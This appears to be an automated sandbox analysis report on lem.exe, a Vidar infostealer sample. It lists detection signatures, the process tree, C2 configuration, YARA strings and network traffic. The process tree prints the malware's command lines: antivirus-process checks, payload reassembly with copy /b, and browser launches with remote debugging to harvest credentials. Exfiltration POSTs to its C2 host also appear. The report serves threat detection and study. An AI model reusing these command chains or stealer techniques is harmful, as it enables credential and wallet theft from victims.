Windows Analysis Report
lem.exe

Overview

General Information

Sample name: lem.exe
Analysis ID: 1581175
MD5: 5782bea403267e4a6ddf82263332ed59
SHA1: 2c1967ed35f79ce390ee56f30fdfa6d97426c4c9
SHA256: 0f9003739fc0213ff837f03f9c1ce4c835e3aab255c94d388aefb9d9b985cb2d
Tags: exe, Vidar, user-lontze7
Infos:

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Monitors registry run keys for changes
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • lem.exe (PID: 528 cmdline: "C:\Users\user\Desktop\lem.exe" MD5: 5782BEA403267E4A6DDF82263332ED59)
    • cmd.exe (PID: 5428 cmdline: "C:\Windows\System32\cmd.exe" /c move Cohen Cohen.cmd & Cohen.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 5700 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6004 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 2796 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 3636 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6200 cmdline: cmd /c md 105235 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 5960 cmdline: extrac32 /Y /E Authorization MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 5972 cmdline: findstr /V "aid" Division MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5612 cmdline: cmd /c copy /b 105235\Inf.com + Proceedings + Recovery + Webster + Sunglasses + Cultural + Tulsa + Being + Name + Silicon + Subtle 105235\Inf.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 1848 cmdline: cmd /c copy /b ..\Glad + ..\Norway + ..\Tired m MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Inf.com (PID: 1276 cmdline: Inf.com m MD5: 62D09F076E6E0240548C2F837536A46A)
        • chrome.exe (PID: 3136 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 4404 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 --field-trial-handle=2028,i,9558792887393012280,750728347199566244,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • msedge.exe (PID: 3788 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
          • msedge.exe (PID: 1996 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2612 --field-trial-handle=2348,i,16825700261060781497,4542343586263828096,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
        • msedge.exe (PID: 2884 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
          • msedge.exe (PID: 1012 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2500 --field-trial-handle=2240,i,2906549977917240690,4367615623914022411,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
      • choice.exe (PID: 576 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • msedge.exe (PID: 1200 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 1960 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1956 --field-trial-handle=2176,i,2777762876112308581,5901726477067019011,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • msedge.exe (PID: 2436 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 2372 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2712 --field-trial-handle=2060,i,14832726659220639319,15004064942317753371,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7204 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6504 --field-trial-handle=2060,i,14832726659220639319,15004064942317753371,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7216 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6820 --field-trial-handle=2060,i,14832726659220639319,15004064942317753371,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup
{"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000000D.00000003.2418518687.0000000001529000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000000D.00000003.2418360409.0000000004761000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000000D.00000002.3268617637.00000000000F1000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000000D.00000002.3268617637.00000000000F1000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0000000D.00000003.2418604420.00000000044E8000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
13.2.Inf.com.f0000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
13.2.Inf.com.f0000.0.unpack | infostealer_win_vidar_strings_nov23 | Finds Vidar samples based on the specific strings | Sekoia.io | Strings:
  • 0x2068c:$str01: MachineID:
  • 0x1f051:$str02: Work Dir: In memory
  • 0x206c3:$str03: [Hardware]
  • 0x20675:$str04: VideoCard:
  • 0x1fce5:$str05: [Processes]
  • 0x1fcf1:$str06: [Software]
  • 0x1f1bb:$str07: information.txt
  • 0x20398:$str08: %s\*
  • 0x203e5:$str08: %s\*
  • 0x1f5a2:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
  • 0x1fb61:$str12: UseMasterPassword
  • 0x206cf:$str13: Soft: WinSCP
  • 0x2016e:$str14: <Pass encoding="base64">
  • 0x206b2:$str15: Soft: FileZilla
  • 0x1f1ad:$str16: passwords.txt
  • 0x1fb8c:$str17: build_id
  • 0x1fc80:$str18: file_data

                System Summary

                Source: Process started, Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Inf.com m, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com, ParentProcessId: 1276, ParentProcessName: Inf.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 3136, ProcessName: chrome.exe

                HIPS / PFW / Operating System Protection Evasion

                Source: Process started, Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Cohen Cohen.cmd & Cohen.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5428, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 3636, ProcessName: findstr.exe
                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2024-12-27T07:00:50.573984+0100 | 2044247 | 1 | Malware Command and Control Activity Detected | 188.245.216.205 | 443 | 192.168.2.5 | 49774 | TCP
                2024-12-27T07:00:53.193412+0100 | 2051831 | 1 | Malware Command and Control Activity Detected | 188.245.216.205 | 443 | 192.168.2.5 | 49780 | TCP
                2024-12-27T07:00:48.168332+0100 | 2049087 | 1 | A Network Trojan was detected | 192.168.2.5 | 49768 | 188.245.216.205 | 443 | TCP
                2024-12-27T07:00:45.763263+0100 | 2859378 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49762 | 188.245.216.205 | 443 | TCP

                AV Detection

                Source: https://bijutr.shop/e3f, Avira URL Cloud: Label: malware
                Source: https://bijutr.shop/bx, Avira URL Cloud: Label: malware
                Source: 0000000D.00000003.2418360409.0000000004761000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
                Source: lem.exe, Virustotal: Detection: 11%
                Source: Submitted Sample, Integrated Neural Analysis Model: Matched 85.4% probability
                Source: lem.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknown, HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49959 version: TLS 1.0
                Source: unknown, HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49750 version: TLS 1.2
                Source: unknown, HTTPS traffic detected: 188.245.216.205:443 -> 192.168.2.5:49756 version: TLS 1.2
                Source: lem.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: cryptosetup.pdbGCTL source: Inf.com, 0000000D.00000002.3274650017.00000000015AA000.00000004.00000020.00020000.00000000.sdmp, 68QI5X.13.dr
                Source: Binary string: cryptosetup.pdb source: Inf.com, 0000000D.00000002.3274650017.00000000015AA000.00000004.00000020.00020000.00000000.sdmp, 68QI5X.13.dr
                Source: C:\Users\user\Desktop\lem.exe, Code function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                Source: C:\Users\user\Desktop\lem.exe, Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com, Code function: 13_2_00A7DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,13_2_00A7DC54
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com, Code function: 13_2_00A8A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_00A8A087
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com, Code function: 13_2_00A8A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_00A8A1E2
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com, Code function: 13_2_00A7E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,13_2_00A7E472
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com, Code function: 13_2_00A8A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,13_2_00A8A570
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com, Code function: 13_2_00A866DC FindFirstFileW,FindNextFileW,FindClose,13_2_00A866DC
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com, Code function: 13_2_00A4C622 FindFirstFileExW,13_2_00A4C622
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com, Code function: 13_2_00A873D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,13_2_00A873D4
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com, Code function: 13_2_00A87333 FindFirstFileW,FindClose,13_2_00A87333
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com, Code function: 13_2_00A7D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,13_2_00A7D921
                Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\
                Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\
                Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\
                Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\
                Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Windows\
                Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\Microsoft\
                Source: chrome.exe, Memory has grown: Private usage: 1MB later: 39MB

                Networking

                Source: Network traffic, Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.5:49768 -> 188.245.216.205:443
                Source: Network traffic, Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.5:49762 -> 188.245.216.205:443
                Source: Network traffic, Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 188.245.216.205:443 -> 192.168.2.5:49780
                Source: Network traffic, Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 188.245.216.205:443 -> 192.168.2.5:49774
                Source: Malware configuration extractor, URLs: https://steamcommunity.com/profiles/76561199809363512
                Source: global traffic, HTTP traffic detected: GET /k04ael HTTP/1.1, Host: t.me, Connection: Keep-Alive, Cache-Control: no-cache
                Source: Joe Sandbox View, IP Address: 23.44.201.19
                Source: Joe Sandbox View, IP Address: 149.154.167.99
                Source: Joe Sandbox View, IP Address: 162.159.61.3
                Source: Joe Sandbox View, JA3 fingerprint: 1138de370e523e824bbca92d049a3777
                Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: unknown, TCP traffic detected without corresponding DNS query: 23.1.237.91
                Source: unknown, TCP traffic detected without corresponding DNS query: 192.229.211.108
                Source: unknown, TCP traffic detected without corresponding DNS query: 23.209.72.40
                Source: unknown, TCP traffic detected without corresponding DNS query: 13.89.178.27
                Source: unknown, TCP traffic detected without corresponding DNS query: 18.164.116.98
                Source: unknown, TCP traffic detected without corresponding DNS query: 23.44.201.19
                Source: unknown, TCP traffic detected without corresponding DNS query: 204.79.197.219
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com, Code function: 13_2_00A8D889 InternetReadFile,SetEvent,GetLastError,SetEvent,13_2_00A8D889
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: bijutr.shopConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /b?rn=1735279295840&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=3918B198F66063F3328CA4FAF7676296&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /b2?rn=1735279295840&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=3918B198F66063F3328CA4FAF7676296&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1AE10fc6589f9ad55d15d371735279297; XID=1AE10fc6589f9ad55d15d371735279297
                Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1735279295839&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=338156387e954518bddd6ad5da364bdb&activityId=338156387e954518bddd6ad5da364bdb&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=0A6FD663C8E04E24A976289B56E6D1F3&MUID=3918B198F66063F3328CA4FAF7676296 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=3918B198F66063F3328CA4FAF7676296; _EDGE_S=F=1&SID=1DDB83DF79F56C08037C96BD787D6D0A; _EDGE_V=1; SM=T
                Source: global traffic
                    DNS traffic detected: DNS query: sAOREpcgcodbdSPJ.sAOREpcgcodbdSPJ
                    DNS traffic detected: DNS query: t.me
                    DNS traffic detected: DNS query: bijutr.shop
                    DNS traffic detected: DNS query: www.google.com
                    DNS traffic detected: DNS query: ntp.msn.com
                    DNS traffic detected: DNS query: bzib.nelreports.net
                    DNS traffic detected: DNS query: clients2.googleusercontent.com
                    DNS traffic detected: DNS query: chrome.cloudflare-dns.com
                    DNS traffic detected: DNS query: sb.scorecardresearch.com
                    DNS traffic detected: DNS query: assets.msn.com
                    DNS traffic detected: DNS query: c.msn.com
                    DNS traffic detected: DNS query: api.msn.com
                Source: unknown
                HTTP traffic detected: POST / HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----U3E3EC2VAAAIEUKFK6XB
                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                    Host: bijutr.shop
                    Content-Length: 256
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5535
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5658
